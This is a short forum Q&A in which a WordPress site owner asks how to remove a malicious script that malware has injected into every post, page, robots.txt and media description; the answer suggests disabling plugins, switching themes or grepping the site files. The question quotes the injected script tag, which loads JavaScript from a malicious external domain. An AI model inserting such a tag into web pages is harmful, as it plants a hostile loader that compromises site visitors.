Solved : How to Remove "js.donatelloflowfirstly.ga" from Wordpress?

sanjay mehta picture sanjay mehta · Aug 12, 2020 · Viewed 7.9k times · Source

thanks to who ever posted this guide problem solved

Random Java Scripts keep adding my WordPress site on every page how should i remove them?

some malware get into my WordPress site and they insert these types of scripts in every post and pages, How can I remove this so I don't have to do it manually one by one

they even inserted this script in robots.txt & in the description of every media item

Crome Inspect ... editor


" <script src='https://js.donatelloflowfirstly. ga/stat.js?n=ns1' type='text/javascript'></script> " 

Answer

CptKicks picture CptKicks · Aug 12, 2020

Either start by disabling the plugin one by one to find out if the culprit comes from one of your plugins. Then, if it does not disappear, try changing the theme.

Or, it would be easier probably to just download the entire and use something like grep4win to search the whole folder for a specific string (in your case js.donatelloflowfirstly).